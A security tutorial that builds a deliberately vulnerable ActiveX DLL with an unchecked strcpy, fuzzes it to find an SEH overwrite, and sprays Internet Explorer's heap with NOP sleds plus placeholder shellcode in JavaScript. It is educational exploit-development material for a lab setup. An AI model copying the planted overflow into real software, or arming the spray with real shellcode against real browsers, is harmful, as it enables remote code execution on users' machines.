Heap Spraying – Active X Controls Under Attack
Author:
Ashfaq Ansari

Reviewed by:
Rating:
4
On January 16, 2014
Last modified:January 17, 2014

Summary:

ActiveX is becoming popular now a days. Hence, increasing the attack surface. This paper introduces you to one such possible. We will see how a simple Buffer Overflow bug can be exploited to gain complete access of the victim's Computer.

Introduction

 
An ActiveX control is essentially a simple OLE object that supports the IUnknown interface. It was introduced in 1996 by Microsoft as a development of its Component Object Model (COM) and Object Linking and Embedding (OLE) technologies and is commonly used in its Windows Operating System.
 
ActiveX controls are highly portable COM objects, used extensively throughout Microsoft Windows platforms and, especially, in web-based applications. COM objects, including ActiveX controls, can invoke each other locally and remotely through interfaces defined by the COM architecture. The COM architecture allows for interoperability among binary software components produced in disparate ways.
 

Disclaimer: The goal of this document is to teach readers how to identify bug in ActiveX controls and exploit software security vulnerabilities. This document has been produced for educational purpose only. The author of this document is not and will not hold any responsibility for any illegal or unauthorized use of the information contained within this document, or that is implied from it. Any use of this information is at the reader’s own risk.

 

Heap Spraying – Active X – Exploit Codes and Paper

wp filebase thumb.php?fid=15&name=thumb HeapSprayActiveX200x200 120x120 Heap Spraying   Active X Controls Under Attack
Heap Spray ActiveX Controls
vulActiveX_Paper.zip
22.0 MiB
141 Downloads
Details...

 
 

Heap Spraying vulActiveX on GitHub

github logo 300x300 Heap Spraying   Active X Controls Under Attack
 
An ActiveX control is an executable program that can be automatically delivered over the Internet where it usually runs within a browser. Contrasted against Java applets, which are created in their own special language, ActiveX controls can be written in many different languages, including C++, Visual Basic, Visual C++, Delphi, Java, C#, and Visual J++.
 

ActiveX controls can also be invoked from web pages through the use of a scripting language or directly with an HTML <OBJECT> tag. If an ActiveX control is not installed locally, it is possible to specify a URL where the control can be obtained. Once obtained, the control installs itself automatically if permitted by the browser. Once it is installed, it can be invoked without the need to be downloaded again.
 

Why ActiveX Controls Are Important?

 
ActiveX makes it fast and easy for developers and Web producers to create unique, interactive Web sites that will make the Internet fundamentally more useful and productive. ActiveX can be used with a wide variety of programming languages from dozens of vendors, developers and Webmasters can make use of their current expertise to more quickly create compelling content. They can also accommodate a wide range of users, as ActiveX will be supported on multiple operating system platforms. And because ActiveX controls are based on the OLE specification, controls written in one language can be re-used within controls written in another language.
 
Before ActiveX, Web content was static, 2-dimensional text and graphics. With ActiveX, Web sites started using multimedia effects, interactive objects, and sophisticated applications that created a great user experience.
 

Other ActiveX Technologies

  • ActiveX Data Objects (ADO)
  • Active Server Pages (ASP)
  • ActiveMovie, later renamed DirectShow
  • Active Messaging, later renamed Collaboration Data Objects
  • Active Scripting, a technology for scripting ActiveX objects
  • ActiveX Streaming Format (ASF), renamed Advanced Streaming Format, then to Advanced Systems Format

 

Scope Of Vulnerability

 
ActiveX controls can be signed or unsigned. A signed control provides a high degree of verification that the control was produced by the signer and has not been modified. Signing does not guarantee the benevolence, trustworthiness, or competence of the signer; it only provides assurance that the control originated from the signer.
 
ActiveX controls are binary code capable of taking any action that the user can take. ActiveX controls do not run in a “sandbox” of any kind. Because of this, it is important to have a high degree of trust in the author of the control.
 
The security issues relating to ActiveX cannot be ignored. ActiveX controls are an integral part of systems and applications, and they are required for essential functions in many environments. Though priorities many change from organization to organization and user to user, it is important to understand the trade-offs between functionality and security and to make informed decisions about the appropriate level of risk.
 
Most spyware programs at present use ActiveX Objects to install themselves onto your system. When a user visits malicious website, the web browser prompts the user to download the ActiveX control to enable the website to be viewed properly. Users see the Security Warning and don’t treat it as a warning but as a sign of approval by VeriSign of whatever other Certificate Authority approved it.
 
Really the only thing stopping the spyware getting installed will be the user not clicking “Yes” to accept the download.
 

Total Number Of Vulnerabilities

 

062113 1053 HeapSprayin11 Heap Spraying   Active X Controls Under Attack
 

The total number of vulnerabilities for 2011 is based on research from independent security experts and vendors of affected products. The yearly total also includes zero-day vulnerabilities that attackers uncovered and were subsequently identified post-exploitation.
 

Web Browser Vulnerabilities

 

062113 1053 HeapSprayin21 Heap Spraying   Active X Controls Under Attack
 

Web browsers are nowadays ever-present components for computing for both enterprise and individual users on desktop and on mobile devices. Web browser vulnerabilities are a serious security concern due to their role in online fraud and in the propagation of malicious code, spyware, and adware.
 

Web-based attacks can originate from malicious websites as well as from legitimate websites that have been compromised to serve malicious content. Some content, such as media files or documents are often presented in browsers via browser plug-in technologies. While browser functionality is often extended by the inclusion of various plug-ins’, the addition of plug-in component also results in a wider potential attack surface for client-side attacks.
 

Web Browser Plug-in Vulnerabilities

 
062113 1053 HeapSprayin31 Heap Spraying   Active X Controls Under Attack
 
Browser plug-ins’ are technologies that run inside the Web browser and extend its features, such as allowing additional multimedia content from Web pages to be rendered. Although this is often run inside the browser, some vendors have started to use sandbox containers to execute plug-ins in order to limit the potential harm of vulnerabilities.
 
Many browsers now include various plug-ins’ in their default installation and, as well, provide a framework to ease the installation of additional plug-ins’. Plug-ins’ now provide much of the expected or desired functionality of Web browsers and are often required in order to use many commercial sites.
 
Vulnerabilities affecting these plug-ins’ are an increasingly favored vector for a range of client-side attacks, and the exploits targeting these vulnerabilities are commonly included in attack kits.
 

ATL ActiveX Control

 
Active Type Library is designed to simplify the process of creating efficient, flexible, lightweight controls. Creating an ActiveX control using ATL is a whole lot easier than creating one from scratch.
 

Creating vulActiveX.dll Project

 
We will create a new “ATL Project” with Visual C++ in Microsoft Visual Studio 2010.
 
Start “Visual Studio 2010” as Administrator.
 
Click on File –> New Project. Let’s name it as “vulActiveX” in this project.
 

062113 1053 HeapSprayin43 Heap Spraying   Active X Controls Under Attack

 

Click on “OK” button.
 
Now, ATL Project Wizard window will pop up.

062113 1053 HeapSprayin59 Heap Spraying   Active X Controls Under Attack

 

Click on “Next >” button.
 

062113 1053 HeapSprayin61 Heap Spraying   Active X Controls Under Attack

 

Select “Dynamic-link library (DLL)” as Application type. Now, click on “Finish” button.
 
Now, we will add an object or a control using the ATL Control Wizard.
 

062113 1053 HeapSprayin71 Heap Spraying   Active X Controls Under Attack

 

Right click on “vulActiveX” project in Solution Explorer window. Next, click on Add–> Class…
 

062113 1053 HeapSprayin81 Heap Spraying   Active X Controls Under Attack
 

Now, choose “ATL Control” and click on “Add” button.
 
As soon as we click on Add button, we will see ATL Control Wizard window.
 

062113 1053 HeapSprayin91 Heap Spraying   Active X Controls Under Attack
 

Input “ATLActivexControl” as “Short name” and then click on “Next” button.
 

062113 1053 HeapSprayin101 Heap Spraying   Active X Controls Under Attack
 

Put a check mark on “Connection points” and click on “Next >” button.
 
Now, we will add “IObjectSafety” interface to our ActiveX. Adding “IObjectSafety” to our control, ensures that our ActiveX is marked as Safe for Scripting and Initialization.
062113 1053 HeapSprayin111 Heap Spraying   Active X Controls Under Attack
 
Click on “IObjectSafety” and move it from “Not supported” column to “Supported” column. Now, click on “Next >” button.
 
062113 1053 HeapSprayin121 Heap Spraying   Active X Controls Under Attack
 
Leave all the options as default values, and then click on “Next >” button.
 
As this ActiveX is very simple in nature, we will leave the Stock Properties to its default values.
062113 1053 HeapSprayin131 Heap Spraying   Active X Controls Under Attack
 
Lastly, click on “Finish” button to complete the ATL Control Wizard.
 

Now, switch to “Class View” and click on “IATLActivexControl“.
 

062113 1053 HeapSprayin141 Heap Spraying   Active X Controls Under Attack

 

Right click on “IATLActivexControl” interface and select on “Add” and then click on “Add Method…
 

062113 1053 HeapSprayin151 Heap Spraying   Active X Controls Under Attack

 
Here comes the “Add Method Wizard” window.
 

062113 1053 HeapSprayin161 Heap Spraying   Active X Controls Under Attack

 

Enter “BufferOverflow” as “Method name“. We will add two parameters to “BufferOverflow” method, first parameter is “IN” type and the second parameter is “OUT” type. Next, click on “Finish” button.
 
Method Name: BufferOverflow
 

First Parameter Details

Parameter attributes

Parameter type

Parameter name

in

BSTR

sBuffer

 

Second Parameter Details

Parameter attributes

Parameter type

Parameter name

out, retval

LONG*

retVal

 
After we have added parameters to our Method “BufferOverflow“, we will write codes for it.
 
Switch to Solution Explorer and double click on ATLActivexControl.cpp and write the below given code.

———- ATLActivexControl.cpp ———-

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
// ATLActivexControl.cpp : Implementation of CATLActivexControl

#include "stdafx.h"
#include "ATLActivexControl.h"

// CATLActivexControl

STDMETHODIMP CATLActivexControl::BufferOverflow(BSTR sBuffer, LONG* retVal)
{
    //USES_CONVERSION macro avoids compiler errors
    //facilitates use of String Conversion macro
    USES_CONVERSION;
    char buffer[200] = {0};
   
    //To convert a Unicode string to ANSI
    //use ATL String Conversion macro W2A()
    char *tmp = W2A(sBuffer);
   
    //Vulnerable code 'strcpy' is vulnerable to buffer overflow attacks
    //it does not validate user input
    strcpy(buffer, tmp);
   
    //Output the message via MesasgeBoxA Win32 API
    MessageBoxA(0,buffer,"vulActiveX Control",0);
    return S_OK;
}

 

062113 1053 HeapSprayin171 Heap Spraying   Active X Controls Under Attack

At this point, our ActiveX DLL is ready and can be compiled. Before compiling the vulActiveX project, let’s examine the vulnerable code in our ActiveX control.
 

Examine Vulnerable Code

 
Let’s build the solution and check the output of the Output window. As we are using strcpy function in our BufferOverflow method, compiler should show a warning message regarding the usage of strcpy function.
 

On the menu bar of Visual Studio 2010, click on Build –> Build Solution.
 

062113 1053 HeapSprayin181 Heap Spraying   Active X Controls Under Attack

 
 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
1>------ Build started: Project: vulActiveX, Configuration: Debug Win32 ------
1>Build started 08-07-2012 11:50:30 AM.
1>InitializeBuildStatus:
1>  Creating "Debug\vulActiveX.unsuccessfulbuild" because "AlwaysCreate" was specified.
1>Midl:
1>  Processing .\vulActiveX.idl
1>  vulActiveX.idl
1>  Processing C:\Program Files\Microsoft SDKs\Windows\v7.0A\include\oaidl.idl
1>  oaidl.idl
1>  Processing C:\Program Files\Microsoft SDKs\Windows\v7.0A\include\objidl.idl
1>  objidl.idl
1>  Processing C:\Program Files\Microsoft SDKs\Windows\v7.0A\include\unknwn.idl
1>  unknwn.idl
1>  Processing C:\Program Files\Microsoft SDKs\Windows\v7.0A\include\wtypes.idl
1>  wtypes.idl
1>  Processing C:\Program Files\Microsoft SDKs\Windows\v7.0A\include\basetsd.h
1>  basetsd.h
1>  Processing C:\Program Files\Microsoft SDKs\Windows\v7.0A\include\guiddef.h
1>  guiddef.h
1>  Processing C:\Program Files\Microsoft SDKs\Windows\v7.0A\include\ocidl.idl
1>  ocidl.idl
1>  Processing C:\Program Files\Microsoft SDKs\Windows\v7.0A\include\oleidl.idl
1>  oleidl.idl
1>  Processing C:\Program Files\Microsoft SDKs\Windows\v7.0A\include\servprov.idl
1>  servprov.idl
1>  Processing C:\Program Files\Microsoft SDKs\Windows\v7.0A\include\urlmon.idl
1>  urlmon.idl
1>  Processing C:\Program Files\Microsoft SDKs\Windows\v7.0A\include\msxml.idl
1>  msxml.idl
1>  Processing C:\Program Files\Microsoft SDKs\Windows\v7.0A\include\oaidl.acf
1>  oaidl.acf
1>  Processing C:\Program Files\Microsoft SDKs\Windows\v7.0A\include\ocidl.acf
1>  ocidl.acf
1>ClCompile:
1>  stdafx.cpp
1>  vulActiveX.cpp
1>  ATLActivexControl.cpp
1>c:\users\ashfaq $\documents\visual studio 2010\projects\vulactivex\vulactivex\atlactivexcontrol.cpp(22): warning C4996: 'strcpy': This function or variable may be unsafe. Consider using strcpy_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
1>          c:\program files\microsoft visual studio 10.0\vc\include\string.h(105) : see declaration of 'strcpy'
1>  Generating Code...
1>  dllmain.cpp
1>  vulActiveX_i.c
1>Link:
1>     Creating library C:\Users\Ashfaq $\Documents\visual studio 2010\Projects\vulActiveX\Debug\vulActiveX.lib and object C:\Users\Ashfaq $\Documents\visual studio 2010\Projects\vulActiveX\Debug\vulActiveX.exp
1>LinkEmbedManifest:
1>  vulActiveX.vcxproj -> C:\Users\Ashfaq $\Documents\visual studio 2010\Projects\vulActiveX\Debug\vulActiveX.dll
1>FinalizeBuildStatus:
1>  Deleting file "Debug\vulActiveX.unsuccessfulbuild".
1>  Touching "Debug\vulActiveX.lastbuildstate".
1>
1>Build succeeded.
1>
1>Time Elapsed 00:00:17.04
2>------ Skipped Build: Project: vulActiveXPS, Configuration: Debug Win32 ------
2>Project not selected to build for this solution configuration
========== Build: 1 succeeded, 0 failed, 0 up-to-date, 1 skipped ==========

 

Let’s have a look at this small piece of information from the Output window.
 

1
2
1>c:\users\ashfaq $\documents\visual studio 2010\projects\vulactivex\vulactivex\atlactivexcontrol.cpp(22): warning C4996: 'strcpy': This function or variable may be unsafe. Consider using strcpy_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
1>          c:\program files\microsoft visual studio 10.0\vc\include\string.h(105) : see declaration of 'strcpy'

 

As expected, we have a warning message that strcpy function may be unsafe and consider using strcpy_s instead.
 
strcpy function does not validate the user input and it’s usage may lead to stack overwrite. Hence, usage of strcpy function makes our ActiveX control vulnerable to buffer overflow attacks.
 

Building vulActiveX Control

 
Before building the project, we will have to change the project configuration from Debug to Release.
 
Right click on vulActiveX solution and select “Configuration Manager…
062113 1053 HeapSprayin191 Heap Spraying   Active X Controls Under Attack
 

Here comes the Configuration Manager window.
062113 1053 HeapSprayin201 Heap Spraying   Active X Controls Under Attack
 
Now, we will have to change the Configuration setting from Debug to Release for both vulActiveX and vulActiveXPS projects.
 

062113 1053 HeapSprayin211 Heap Spraying   Active X Controls Under Attack
 
Once we have changed the Configuration settings from Debug to Release, click on Close button.
 

At this point, we are ready to build the project.

Click on Build –> Build Solution. You may press F7 key on your keyboard to build the solution.
 

062113 1053 HeapSprayin221 Heap Spraying   Active X Controls Under Attack
 
Let’s verify whether the building process completed successfully. Check the Output window.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
1>------ Build started: Project: vulActiveX, Configuration: Release Win32 ------
1>Build started 08-07-2012 01:14:49 PM.
1>InitializeBuildStatus:
1>  Creating "Release\vulActiveX.unsuccessfulbuild" because "AlwaysCreate" was specified.
1>Midl:
1>  Processing .\vulActiveX.idl
1>  vulActiveX.idl
1>  Processing C:\Program Files\Microsoft SDKs\Windows\v7.0A\include\oaidl.idl
1>  oaidl.idl
1>  Processing C:\Program Files\Microsoft SDKs\Windows\v7.0A\include\objidl.idl
1>  objidl.idl
1>  Processing C:\Program Files\Microsoft SDKs\Windows\v7.0A\include\unknwn.idl
1>  unknwn.idl
1>  Processing C:\Program Files\Microsoft SDKs\Windows\v7.0A\include\wtypes.idl
1>  wtypes.idl
1>  Processing C:\Program Files\Microsoft SDKs\Windows\v7.0A\include\basetsd.h
1>  basetsd.h
1>  Processing C:\Program Files\Microsoft SDKs\Windows\v7.0A\include\guiddef.h
1>  guiddef.h
1>  Processing C:\Program Files\Microsoft SDKs\Windows\v7.0A\include\ocidl.idl
1>  ocidl.idl
1>  Processing C:\Program Files\Microsoft SDKs\Windows\v7.0A\include\oleidl.idl
1>  oleidl.idl
1>  Processing C:\Program Files\Microsoft SDKs\Windows\v7.0A\include\servprov.idl
1>  servprov.idl
1>  Processing C:\Program Files\Microsoft SDKs\Windows\v7.0A\include\urlmon.idl
1>  urlmon.idl
1>  Processing C:\Program Files\Microsoft SDKs\Windows\v7.0A\include\msxml.idl
1>  msxml.idl
1>  Processing C:\Program Files\Microsoft SDKs\Windows\v7.0A\include\oaidl.acf
1>  oaidl.acf
1>  Processing C:\Program Files\Microsoft SDKs\Windows\v7.0A\include\ocidl.acf
1>  ocidl.acf
1>ClCompile:
1>  stdafx.cpp
1>  ATLActivexControl.cpp
1>ATLActivexControl.cpp(22): warning C4996: 'strcpy': This function or variable may be unsafe. Consider using strcpy_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
1>          C:\Program Files\Microsoft Visual Studio 10.0\VC\include\string.h(105) : see declaration of 'strcpy'
1>  vulActiveX.cpp
1>  Generating Code...
1>  dllmain.cpp
1>  vulActiveX_i.c
1>Link:
1>     Creating library C:\Users\Ashfaq $\Documents\visual studio 2010\Projects\vulActiveX\Release\vulActiveX.lib and object C:\Users\Ashfaq $\Documents\visual studio 2010\Projects\vulActiveX\Release\vulActiveX.exp
1>  vulActiveX.vcxproj -> C:\Users\Ashfaq $\Documents\visual studio 2010\Projects\vulActiveX\Release\vulActiveX.dll
1>FinalizeBuildStatus:
1>  Deleting file "Release\vulActiveX.unsuccessfulbuild".
1>  Touching "Release\vulActiveX.lastbuildstate".
1>
1>Build succeeded.
1>
1>Time Elapsed 00:00:10.96
2>------ Skipped Build: Project: vulActiveXPS, Configuration: Release Win32 ------
2>Project not selected to build for this solution configuration
========== Build: 1 succeeded, 0 failed, 0 up-to-date, 1 skipped ==========

 

Solution built successfully. The vulActiveX.dll is located at the below given path.
 

1
2
3
4
5
6
7
8
1>Link:
1>     Creating library C:\Users\Ashfaq $\Documents\visual studio 2010\Projects\vulActiveX\Release\vulActiveX.lib and object C:\Users\Ashfaq $\Documents\visual studio 2010\Projects\vulActiveX\Release\vulActiveX.exp
1>  vulActiveX.vcxproj -> C:\Users\Ashfaq $\Documents\visual studio 2010\Projects\vulActiveX\Release\vulActiveX.dll
1>FinalizeBuildStatus:
1>  Deleting file "Release\vulActiveX.unsuccessfulbuild".
1>  Touching "Release\vulActiveX.lastbuildstate".
1>
1>Build succeeded.

 

Navigate to C:\UsersAshfaq $\Documents\visual studio 2010\Projects\vulActiveX\Release\
 

062113 1053 HeapSprayin231 Heap Spraying   Active X Controls Under Attack
 

Testing vulActiveX Control

 
As we have already built the solution, it will be a better idea to test the control for the functionality before we start writing the HTML file.
 
Testing our vulActiveX control will demonstrate whether our control is working as expected.
 

Click on Tools –> ActiveX Test Container
 

062113 1053 HeapSprayin241 Heap Spraying   Active X Controls Under Attack

 

If you do not see ActiveX Test Container in your Visual Studio 2010, probably TstCon.exe is not added to External Tools…
 

Download Link: http://blogs.msdn.com/b/vcblog/archive/2010/03/18/activex-test-container-application-is-still-available.aspx
 

Here comes the ActiveX Control Test Container window.

062113 1053 HeapSprayin251 Heap Spraying   Active X Controls Under Attack

 

Now, we will insert the vulActiveX control to it and invoke the methods. Click on Edit –> Insert New Control.
 

062113 1053 HeapSprayin261 Heap Spraying   Active X Controls Under Attack

 

Select ATLActivexControl Class and then click on OK button.
 

062113 1053 HeapSprayin271 Heap Spraying   Active X Controls Under Attack

 

Right click on ATLActivexControl and select “Invoke Methods…” from the context menu.
 

062113 1053 HeapSprayin281 Heap Spraying   Active X Controls Under Attack

 

Input “HackSys Team – Panthera” as Parameter Value. Now, click on Set Value button and lastly click on Invoke button.

You should see a message box with the data that we entered in Parameter Value text box.
 
We have successfully tested our vulActiveX control and it’s working as expected.
 

Writing HTML To Test vulActiveX Control

 
Locate ATLActivexControl.htm in Solution Explorer. Double click on it to open the source code for editing.
 

062113 1053 HeapSprayin291 Heap Spraying   Active X Controls Under Attack

 

Our plan is to pass the arguments to the BufferOverflow method in vulActiveX.dll using Java Script.
 

1
<OBJECT ID="ATLActivexControl" CLASSID="CLSID:C44CBF61-7844-4C4B-BC77-7643FD70848E"></OBJECT>

 

The above code loads the vulActiveX.dll control identified by GUID. Visual Studio automatically assigns a unique GUID to our control so that the control can be identified.
 
Replace the content of ATLActivexControl.htm with the below given HTML content. I have commented the source code for better understanding. If you face any issue, please feel free to write to us.
 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
<html>
<head>
    <title>ATLActivexControl BufferOverflow</title>
    <script language="javascript" type="text/javascript">

        //Function to call BufferOverflow method from vulActiveX.dll
        function BOF() {

            //Assigns _vulActiveX variable to ATLActivexControl
            var _vulActiveX = document.getElementById("ATLActivexControl");

            //Pass the parameter to BufferOverflow function
            _vulActiveX.BufferOverflow("HackSys Team - Panthera");
        }

    </script>
</head>
<body>
    <object id="ATLActivexControl" classid="CLSID:C44CBF61-7844-4C4B-BC77-7643FD70848E">
    </object>
    <div>
        <h1>
            vulActiveX BufferOverflow</h1>
        <div>
            <h2>
                HackSys Team - Panthera</h2>
            <br />
            <b>
                <p>
                    Website: <a href="http://hacksys.vfreaks.com/">http://hacksys.vfreaks.com/</a></p>
                <p>
                    Email: <a href="mailto:hacksysteam@hotmail.com">hacksysteam@hotmail.com</a></p>
            </b>
        </div>
        <p>
            Click on the button to invoke <b>BufferOverflow</b> method.</p>
        <input type="button" onclick="BOF();" value="Invoke BufferOverflow" />
    </div>
</body>
</html>

 

Vulnerability Research

 
In this phase we will try to find whether vulActiveX.dll is really vulnerable to buffer overflow attacks. Vulnerability exists when we are able to write beyond the stack. If we are able to control EIP (Extended Instruction Pointer) register or overwrite Structured Exception Handler, there are changes that we may exploit the program. The best way to find a bug in a program is to disassemble it using IDA Pro or Immunity Debugger and read and analyse the vulnerability. But, this may take many hours of tough dedication.
 
Simplest way of finding a bug is by fuzzing the program. Fuzzing is a dynamic-analysis technique that consists of testing an application by providing it with malformed or unexpected input.
 

COMRaider ActiveX Fuzzer

 
COMRaider is an application designed to help you fuzz COM object interfaces. COMRaider is a mix of a VB6 interface and some VC6 dlls. All of the main interface code and database access is done in VB for simplicity. Disassembly engine (olly.dll), debugger core (crashmon.dll) and API Logger (logger.dll) have been done in VC6.
 

062113 1053 HeapSprayin301 Heap Spraying   Active X Controls Under Attack

 

Since COMRaiders main focus is on scriptable components which can be loaded in Internet Explorer, the fuzzing implementation is based off of dynamically created Windows Script Files (*.wsf). This design has some drawbacks, in that target objects will have to support the IDispatch or IDispatchEx interfaces in order to be scriptable, and that scripting clients can only access the default interface of a COM object.
 

Is vulActiveX.dll vulnerable?

 
We will use Windows XP SP3 with Inter Explorer 6 for fuzzing our vulActiveX control. Before going forward, let’s copy vulActiveX.dll and ATLActivexControl.htm to Windows XP SP3 virtual machine.
 

062113 1053 HeapSprayin311 Heap Spraying   Active X Controls Under Attack

 

Open Command Prompt and register our vulActiveX.dll
 

1
regsvr32 vulActiveX.dll

 

062113 1053 HeapSprayin321 Heap Spraying   Active X Controls Under Attack
 
vulActiveX.dll has been registered successfully. Now, let’s test the HTML file and try to find if our vulactiveX.dll is working as expected. When we open the HTML file, we will get a warning.
 

062113 1053 HeapSprayin331 Heap Spraying   Active X Controls Under Attack

 

Right click on the yellow bar and select “Allow Blocked Content…
 

062113 1053 HeapSprayin341 Heap Spraying   Active X Controls Under Attack

 

Now, click on Invoke BufferOverflow button.
 

Wow vulActiveX control is working as expected. In the next phase, we will use COMRaider to fuzz our ActiveX control.
 

Fuzzing vulActiveX

 
In this phase, we will try to find if we are able to control EIP register or Structured Exception Handler. We will identify the number of bytes it takes to cause an EXCEPTION.
 

Let’s fire up COMRaider and start fuzzing.
 

062113 1053 HeapSprayin351 Heap Spraying   Active X Controls Under Attack

 

In COMRaider, click on Start. Next, click on “Choose ActiveX dll or ocx file directly” and then click on Next button. Lastly, locate the vulActiveX.dll and click on Open.
 

vulActiveX.dll will be loaded for fuzzing. We will fuzz the entire available member to determine the vulnerable member. COMRaider dynamically creates collection of Windows Script File (*.wsf) to test whether EXCEPTION occurs after sending malformed inputs.
 

062113 1053 HeapSprayin361 Heap Spraying   Active X Controls Under Attack

 

Right click on BufferOverflow member and select “Fuzz member“. A list of *.wsf files will be created for fuzzing. Now, click on “Next >>” button.
 

062113 1053 HeapSprayin371 Heap Spraying   Active X Controls Under Attack

 

Let’s hope we get to see EXCEPTIONS to occur after fuzzing is over.
 

062113 1053 HeapSprayin381 Heap Spraying   Active X Controls Under Attack

 

Wow, from the above screenshot, it indicates that COMRaider detected 10 exceptions. Next, click on OK button.
 

Let’s view the EXCEPTION details.
 

062113 1053 HeapSprayin391 Heap Spraying   Active X Controls Under Attack

 

Right click on any entry under “File” column. Next, right click on first entry under “Instruction” column and click on “View Details“.
 

A new window with EXCEPTION details will appear.
 

062113 1053 HeapSprayin401 Heap Spraying   Active X Controls Under Attack

 

Yeah, we were able to overwrite and corrupt the Structured Exception Handler Chain but we were unable to overwrite EIP register. An important thing to find is the amount of junk data that will overwrite Structured Exception Handler.
 

Let’s go for it.
 

062113 1053 HeapSprayin411 Heap Spraying   Active X Controls Under Attack

 

Right click on any of the entry under “File” column and select “View File” from the context menu.
 

062113 1053 HeapSprayin421 Heap Spraying   Active X Controls Under Attack

 

From the 675263152.wsf file, we came to know that, if we will pass 14356 bytes of junk data to BufferOverflow method, then it will overwrite the Structured Exception Handler.
 

Our plan is to spray the Heap of Internet Explorer’s Process Memory with No Operation Sleds and shellcode, this will slide the CPU to our shellcode and execute it.
 

Finally, in this phase, we have determined that vulActiveX.dll is really vulnerable.
 

Heap

 
Heap is a common name for dynamically allocated memory. Memory allocation requests are fulfilled by locating and allocating a block of unused memory from a large pool of memory known as the Heap.
 

Heap Spraying

 
The Heap Spraying technique was discovered by Skylined.
 

Heap Spraying is an attack technique commonly used in hijacking victim’s browsers to download and execute malicious code. In Heap Spraying, a large portion of the victim process’s heap is filled with malicious code. As the location of the injected code is not exactly predictable, heap-spraying attacks need to inject a huge amount of malicious code to increase the chance of success of exploitation.
 

Injected payload usually includes lots of No Operation (NOP) instructions (e.g. 0x90), which redirect the execution to shellcode.
 

A heap spray does not actually exploit any security issues but it can be used to make a security issue easier to exploit. A heap spray by itself cannot be used to break any security boundaries.
 

Heap Spraying Using JavaScript

 

Heap Spraying for web browsers is commonly implemented in JavaScript and the heap is sprayed by creating large strings. The most common technique used is to start with a string of one character and concatenating it with itself over and over. This way, the length of the string can grow exponentially up to the maximum length allowed by the scripting engine.
 

Depending on how the browser implements strings, either ASCII or Unicode characters can be used in the string. The heap spraying code makes copies of the long string with shellcode and stores these in an array, up to the point where enough memory has been sprayed to ensure the exploit works.
 

———- HeapSpray_vulActiveX.html ———-

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
<html>
<head>
    <title>Heap Spraying In Action JavaScript</title>
    <object classid='CLSID: C44CBF61-7844-4C4B-BC77-7643FD70848E' id='_vulActiveX'>
    </object>
    <script type="text/javascript" language="javascript">
        //==========================================//
        //      Heap Spraying Using JavaScript      //
        //          HackSys Team – Panthera         //
        //         http://hacksys.vfreaks.com/      //
        //          hacksysteam@hotmail.com         //
        //                                          //
        //      unescape() function requirement     //
        //                                          //
        //                  HA CK SY S!             //
        //                  AH KC YS !S             //
        //              A  H  K  C  Y  S  !  S      //
        //              41 48 4b 43 59 53 21 53     //
        //==========================================//

        //shellcode = "HACKSYS!"
        //please remove backslashes.
        shellcode = unescape('%u\4148%u\4b43%u\5953%u\2153');

        nops = unescape('%u\9090%u\9090');
        headersize = 20;

        //write the output to Internet Explorer's window
        document.write("<H2>Heap Spraying In Action</H2></br>");

        //create one block with nops
        document.write("Creating one block of memory with <b>NOPS</b>.</br>");
        slackspace = headersize + shellcode.length;
        while (nops.length < slackspace) nops += nops;
       fillblock = nops.substring(0, slackspace);

       //enlarge block with nops, size 0x50000
       document.write("Enlarging the memory with <b>NOPS</b> of size <b>0x5000</b>.</br>");
        block = nops.substring(0, nops.length - slackspace);
        while (block.length + slackspace < 0x50000) block = block + block + fillblock;

       document.write("Spraying <b>NOPS + SHELLCODE</b> <b>250</b> times.</br>");

        //spray 250 times : nops + shellcode
        memory = new Array();
        for (counter = 0; counter < 250; counter++) {
           memory[counter] = block + shellcode;

           //show the status of spray on Status bar
           window.status = "Spraying: " + Math.round(100 * counter / 250) + "% done";
       }

       document.write("Allocated <b>" + (block.length + shellcode.length).toString() + "</b> bytes.<br>");
        document.write("Heap Spraying completed successfully.<br>");
        window.status = "Heap Spraying Done";
        alert("Heap Spraying Done");
    </script>
</head>
<body>
</body>
</html>

 

Create a new HTML file named as HeapSpray_vulActiveX.html and copy the above HTML codes to it. I suggest you to download the ZIP archive available for download. The archive contains all the Heap Spraying scripts.
 

Understanding Heap Spraying

 
In this phase, we will try to find out what exactly Java script are doing and how heap spraying in working in real time.
 

1
2
3
4
5
slackspace = headersize + shellcode.length;

while (nops.length < slackspace) nops += nops;

fillblock = nops.substring(0, slackspace);

 

The above Java script code creates one block of memory containing NOPS in the Process Heap.
 

062113 1053 HeapSprayin431 Heap Spraying   Active X Controls Under Attack

 

1
2
3
4
5
6
memory = new Array();

for (counter = 0; counter < 250; counter++) {

        memory[counter] = block + shellcode;
}

 

The above piece of code sprays NOPs + Shellcode into Process Heap Memory.
 

062113 1053 HeapSprayin441 Heap Spraying   Active X Controls Under Attack

 

Inspecting Process Memory

 

In this phase, we will try to find out how heap spraying in working in real time.

We will try to visualise whether, we are able to affect Process Heap Memory. We will use VMMap (a process virtual and physical memory analysis utility) to inspect the Heap Fragmentation.
 

Open Internet Explorer and VMMap.
 

062113 1053 HeapSprayin451 Heap Spraying   Active X Controls Under Attack

 

Select IEXPLORE.EXE from the “Select or launch Process” window. Next, click on OK button.
 

Let’s check the normal status of Internet Explorer’s Heap Memory.
 

Please Note: As we have not sprayed the “Process Heap” of Internet Explorer, there we will be less fragmentation.

 

062113 1053 HeapSprayin461 Heap Spraying   Active X Controls Under Attack

 

Let’s run the HeapSpray_vulActiveX.html and check the output. Once, Heap Spraying is done, press F5 on VMMap.
 

062113 1053 HeapSprayin471 Heap Spraying   Active X Controls Under Attack

 

Here is the rough comparison of Process Memory before and after spraying.
 

